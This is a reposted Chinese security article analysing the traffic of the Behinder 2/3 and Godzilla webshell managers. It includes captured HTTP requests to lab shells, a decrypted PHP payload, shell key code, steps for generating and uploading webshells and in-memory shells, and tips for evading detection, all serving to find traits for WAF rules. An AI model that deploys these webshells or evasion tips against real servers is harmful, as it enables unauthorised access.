冰蝎2和3及哥斯拉Godzilla特征分析
2020-12-16 03:09:16 Author: www.freebuf.com(查看原文) 阅读量:342 收藏

冰蝎2

冰蝎是一款基于Java开发的动态加密通信流量的新型Webshell客户端。

冰蝎工具通信原理

冰蝎的通信过程可以分为两个阶段:

密钥协商

加密传输

1)第一阶段-密钥协商

a.php

攻击者通过GET方式请求服务器密钥;

GET /hackable/uploads/shell.php?pass=300 HTTP/1.1

upload_dde87681eace4aab7bc3fef9934122e1.png

当我们输入命令操作后,请求方式就会变成POST

POST /hackable/uploads/shell.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=lsgi7fb09enqcn3svmti4eqbo7; path=/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.163 Safari/535.1
Cache-Control: no-cache
Pragma: no-cache
Host: 192.168.0.129:777
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
Content-Length: 1112

hxx/2GPvW+iHRI+j7FKIjpbHv6JcLQzyNs8uQ1IPDTB2xcS5+oKiaSKujjcZ/uYLEwn6oA8a1YehtGbT9arlXe3LaA0kig9BITcK3iZZKYhjpK0/ziTfTa5CnU3lfrnmCcadnmtgUKyTZDdb93DSqwyGn3cFb7BuIPkdCu6SpLov3+EExlHPbY/+6PiiDIpWGCxzkEIwli6zJiS8fa4fSxYcr/e0viSLVI3eXHAvhcohXLsVbWV5HmZMovp4EHYkcofLdR7fjx+NZbIfBOTZfzbOTOXBRBI2GBEUZG4uzi7s0xeHzUWeKf/n+CjrCs1OgYT893Q5KyRSr9+wn3Gi8JfDYPKCady

b.jsp

先通过GET方法,向服务器请求随机密钥

GET /s.jsp?pass=987 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ) AppleWebKit/534.12 (KHTML, like Gecko) Maxthon/3.0 Safari/534.12
Host: 192.168.0.132:555
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=D89B13E292E0D8D7CD9433522F293EDB; Path=/; HttpOnly
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 16  
Date: Wed, 18 Nov 2020 12:32:58 GMT

9e39ae1ad6ee9e32 //服务器返回的密钥

同样输入命令后,也和PHP一样,请求方式就变成了POST

POST /s.jsp HTTP/1.1
Content-Type: application/octet-stream
Cookie: JSESSIONID=D89B13E292E0D8D7CD9433522F293EDB; Path=/; HttpOnly
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ) AppleWebKit/534.12 (KHTML, like Gecko) Maxthon/3.0 Safari/534.12
Cache-Control: no-cache
Pragma: no-cache
Host: 192.168.0.132:555
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
Content-Length: 8556

75Zv64K/CymLAnv5UhDhKfJdj58rU1o/0yZ7D0XlJU7MgTbzaA4zrvImnNs1Y1cmNPGAdxaaEaYxvasJSp2sCHk5TPv+fWunDMvZWoBqjcnkHGMYyohZpH1v7OvWcdAZPg7CIL87y9HPc2lydWTiBVspavD0FkRVY7/XmeWw7m/O42+SE28iQSgyLf/

2)服务器使用密钥

使用随机数MD5的高16位作为密钥,存储到会话的 $_SESSION 变量中,并返回密钥给攻击者。

3)解密

刚才php请求密钥的数据包中获取到的密钥:

95c4e8e4eef4b1ac  //服务器返回的密钥

a.请求密文upload_dbb518ba46d228a6c1fcc4ecc3bf89d1.pngb.输入密钥和请求密文,解密后为 base64 编码upload_9440402950e29c2c5b8273cd011d18ab.png

c.base64解码

@error_reporting(0);
function main($content)
{
$result = array();
$result["status"] = base64_encode("success");
$result["msg"] = base64_encode($content);
$key = $_SESSION['k'];
echo encrypt(json_encode($result),$key);
}

function encrypt($data,$key)
{
if(!extension_loaded('openssl'))
{
for($i=0;$i<strlen($data);$i++) {
$data[$i] = $data[$i]^$key[$i+1&15];
}
return $data;
}
else
{
return openssl_encrypt($data, "AES128", $key);
}
}$content="327c829b-f4d3-41eb-a251-d561e01011ec";
main($content);

4)特征总结

a.ACCEPT字段

冰蝎2默认Accept字段的值很特殊,而且每个阶段都一样

Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2

b.UA字段

冰蝎内置了十余种 UserAgent ,每次连接 shell 会随机选择一个进行使用。但都是比较老的,容易被检测到,但是可以在burp中修改ua头。

c.Content-Length

Content-Length: 16, 16就是冰蝎2连接的特征

冰蝎3

对比冰蝎2,冰蝎3取消动态密钥获取,目前很多waf等设备都做了冰蝎2的流量特征分析,所以3取消了动态密钥获取;只有在无动态密钥交互失败后,才会进入常规的密钥交互阶段。

<?php
@error_reporting(0);
session_start();
$key="e45e329feb5d925b";
//该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond
$_SESSION['k']=$key;

密钥生成可以看出,使用密码的md5结果的前16位。

特征分析

php抓包

看包没有发现什么特征,但是可以发现它是POST请求的

1)Accept头有application/xhtml+xmlapplication/xmlapplication/signed-exchange属于弱特征

2)ua头该特征属于弱特征。通过burp可以修改,冰蝎3.0内置的默认16个userAgent都比较老。现实生活中很少有人使用,所以这个也可以作为waf规则特征。

POST /hackable/uploads/shell.php HTTP/1.1
Content-Type: text/html;charset=utf-8
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36
Cache-Control: no-cache
Pragma: no-cache
Host: 192.168.0.132:777
Connection: keep-alive
Content-Length: 1432
Cookie: PHPSESSID=peimnpkc4hi70akr2seroj6mi2

3Mn1yNMtoZViV5wotQHPJtwwj0F4b2lyToNK7LfdUnN7zmyQFfx/zaiGwUHg+8SlXZemCLBkDIvxiBIGd6bgOEiZtNpn6YmnWiiaCBNbXkC5JWFTARrD8lCOCQ4ZVFjsJFDaAOwzinbqne/oYuNwWjQvKM9ii2RE/b+Gc+ya2f4+OIDU2Wk/QSIL7GOAoyaUYZSq4bL2wmX5RnP1Lbf7S+TAy3K7JPruBiZeZGC/ay14vUj4+IgmNHwEAzWl3DNIsL1yhH4Do5FI8HwZpG5XnrZwpKdFIEgN4GKmcDODTdO2pj8DVXCwes3m+v/wRykVd++xsex2EkGn9p0SgL+GpXlGg6Ol

jsp抓包

特征分析Content-Type: application/octet-stream 这是一个强特征查阅资料可知octet-stream的意思是,只能提交二进制,而且只能提交一个二进制,如果提交文件的话,只能提交一个文件,后台接收参数只能有一个,而且只能是流(或者字节数组);很少使用。

POST /3.jsp HTTP/1.1
Content-Type: application/octet-stream
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15
Cache-Control: no-cache
Pragma: no-cache
Host: x.x.x.x:888
Connection: keep-alive
Content-Length: 11864
Cookie: JSESSIONID=F063F33F5F8BE2F3C75311C7128E70D1

F1w4ahdSJGUxG3t11sfr6qxbThq9VnL7i6K1/NzHsb0s9eQIfj2qDW/r5OeNJjI0U/BrUp2pHtrtCkdiUeJVIKFzCMSfe8yhEddJFJideje6Eb0dtrHHd9YYaZcxqQL2FFusmCXFICrCh3MsG+BYZHKbNVkWJrsTiu/1VBPV9CBkJzPBO4aH98EBFycyQbpGCHjAPaZmbaIIVWenbm642/xYr85uQ5/K74vlQ9wR5iGLZvyH8WZOF0YpqhxjkApKeShoSGX/C87NiqMTVAB+DcFNf4HaitS1o7Q6kXnUET00L5irn+WdNis2mvNEzr+DGay6LSKKD9kDl6iTKD/1aiXfk5EgH4PfR0/aXCEKTsFW29So6wbhR6u4H3/

Godzilla特征分析

介绍

哥斯拉是一个基于流量、HTTP全加密的webshell管理工具相对于蚁剑,冰蝎;哥斯拉具有以下优点。

全部类型的shell均过市面所有静态查杀

流量加密过市面全部流量waf

Godzilla自带的插件是冰蝎、蚁剑不能比拟的

使用

(1)Godzilla的运行需要java环境。在cmd下切换到哥斯拉所在目录,输入

java -jarGodzilla.jar

此时会在同目录下生成data.db数据库存放数据(2)Godzilla的webshell可以自定义生成操作方法:管理-生成所需的webshell,哥斯拉支持jsp、php、aspx等多种载荷java和c#的载荷原生实现AES加密1

PHP使用亦或加密2(3)将生成的webshell上传到目标机器,然后在Godzilla目标栏添加相应的url

PHP连接特征

(1)php_XOR_BASE64

设置代理,用burp抓包。截取到特征发现请求都含有"pass="第一个包

POST /hackable/uploads/base.php HTTP/1.1
User-Agent: Java/1.8.0_131
Host: 192.168.0.132:777
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-type: application/x-www-form-urlencoded
Content-Length: 23275
Connection: close

pass=KX4nWAFVJ005aWdeUVosCjpuL0k7YApWKGVGfHFTUXg5WDNFOwszSQEDAVVRWjdGKHU3RwBgLEkGRgV5e3cgVCpxP0YBVVBRB3d3WlFZJ0c5bjdcAVEGUgB2BEh%2BXQJeMGMdQAMKN2M
BAmALeE1UWjpuK1wsUjN%2FAVx7RGhzNFwpBFRcBn9YTylIXkJ9Q1F4J2cKVyt7IF4CZmxVeXczVTYGM2Q3CA1pN11GW2taDUQ6bitKOgpYTjlmAFRrWSdJOWE3QAFRK10zZQQCUVo3XyhuFn4hUSBeKnJ0VXt3IFQycS8FAX8nQwAADERRczdGOwQvWAEKN1ICaXxdeW
ASfSBfJFcreyMAJ2BafHFdIFQqdSdJOGAzCABcAVVrWSdJOWI8ADBvVFMBA2deeXM3ATphHXcGb1RTKHJeQn1DUXgFZ1V7JmkRVAdmAFhWcw1FAV8nWQdgI1EAAntUUAcjXwFaXFk7YC9VOXZZS3l3DQQnZwp
XK3sgXgJmbF17YSNeAmEdXDoKNw0CaXsCUU0GXTpYCUc7YC9DOwMMRWhjVFU6WyNKOG8zSQBYVkJ5bBJ9IF8kVyt7IF4qcnRVY3NQQTlxCUkpewVQBml3WlE

第二个包

POST /hackable/uploads/base.php HTTP/1.1
User-Agent: Java/1.8.0_131
Host: 192.168.0.132:777
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-type: application/x-www-form-urlencoded
Content-Length: 51
Connection: close

pass=AWEzAAN%2FWFI3XHNGaGBQWDEHPwY4fSQAM2AIDw%3D%3D

(2)php_XOR_RAW

执行ls和cat命令,命令虽然不同,但是发现请求中都含有一样的

:T[6
L9e

ls命令的包

POST /hackable/uploads/g.php HTTP/1.1
Cookie: PHPSESSID=oo9hn9d3uqq7661o3oldu0ojo7;
User-Agent: Java/1.8.0_131
Host: 192.168.0.132:777
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-type: application/x-www-form-urlencoded
Content-Length: 56
Connection: close

:T[6
L9e[aqP)[T\O9t

cat命令的包

POST /hackable/uploads/g.php HTTP/1.1
Cookie: PHPSESSID=oo9hn9d3uqq7661o3oldu0ojo7;
User-Agent: Java/1.8.0_131
Host: 192.168.0.132:777
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-type: application/x-www-form-urlencoded
Content-Length: 72
Connection: close

:T[6
L9eh_8D0c+r}L6[gYccY
)[T\O9t

当以为这就是特征时就大错特错了,这只是这一次连接所含有的特征

jsp连接特征

(1)java_AES_BASE64

POST /gejs.jsp HTTP/1.1
User-Agent: Java/1.8.0_131
Host: 192.168.0.132:555
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-type: application/x-www-form-urlencoded
Content-Length: 33035
Connection: close

pass=0%2FMHwbBP6vuX0WyYztOU9DrUPcD0Zwx0KhArobwwHBDld91Y8xrUqPxo40dKoSbGd%2FxDF4yJopsUIHMI8NMfFUl0oxBzWPyMdTmxAntagmMGLGiqB1ckbl5G%2FlapnewWrvhhdqtj0eT2zvUes%2Bg6yhFGVjLstoOdJxkYPY6XB70AeffugDlCkUYAyHyrTymPocUs14sKD5ItAn5147goo9TAdBH0kgSNlxbqxMqTPbgjKljsvC53fFB%2BO5jKUBCBvsCR1W%2FLhPA42qp1e%2Fl0cmUohwSAT3N0s9r%2FzRVlB3lQkXnV895dz48DyPbYjJp%2Bhpf1qFjbCy1o8Zd771ObGbKvWr1O5PZOTNKBu

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=509B4522D1A54112AA93CCAE0311FEFD; Path=/; HttpOnly
Content-Type: text/html
Content-Length: 0
Date: Wed, 18 Nov 2020 15:04:32 GMT
Connection: close

与php请求一样都含有"pass="而且发起连接时服务器返回的Content-Length是0

(2)java_AES_RAW

POST /rwj.jsp HTTP/1.1
User-Agent: Java/1.8.0_131
Host: 192.168.0.132:555
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-type: application/x-www-form-urlencoded
Content-Length: 23360
Connection: close

ÓóÁ°OêûÑlÎÓô:Ô=Àôgt*+¡¼0åwÝXóÔ¨ühãGJ¡&ÆwüC¢sðÓIt£sXüu9±{Zc,hªW$n^FþV©ì®øav«cÑäöÎõ³è:Ê

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=1C26762D96A561D4A63BDE104E22930C; Path=/; HttpOnly
Content-Type: text/html
Content-Length: 0
Date: Wed, 18 Nov 2020 15:19:56 GMT
Connection: close

内存马

内存shell模块实现了在tomcat中上传一个哥斯拉的马或者冰蝎、菜刀的马。甚至是上传regeorg建立http隧道。upload_e734e148c72cca39cd134cc82ec643d0.png在这里我选择上传一个冰蝎马。upload_fa1d5751f210ad91d264a1bac9394026.png然后在冰蝎连接,成功连接。upload_563009533879d0481ada7ae666db022e.png内存shell 无日志,会在tomcat重启后消失。


文章来源: https://www.freebuf.com/articles/web/257956.html
如有侵权请联系:admin#unsafe.sh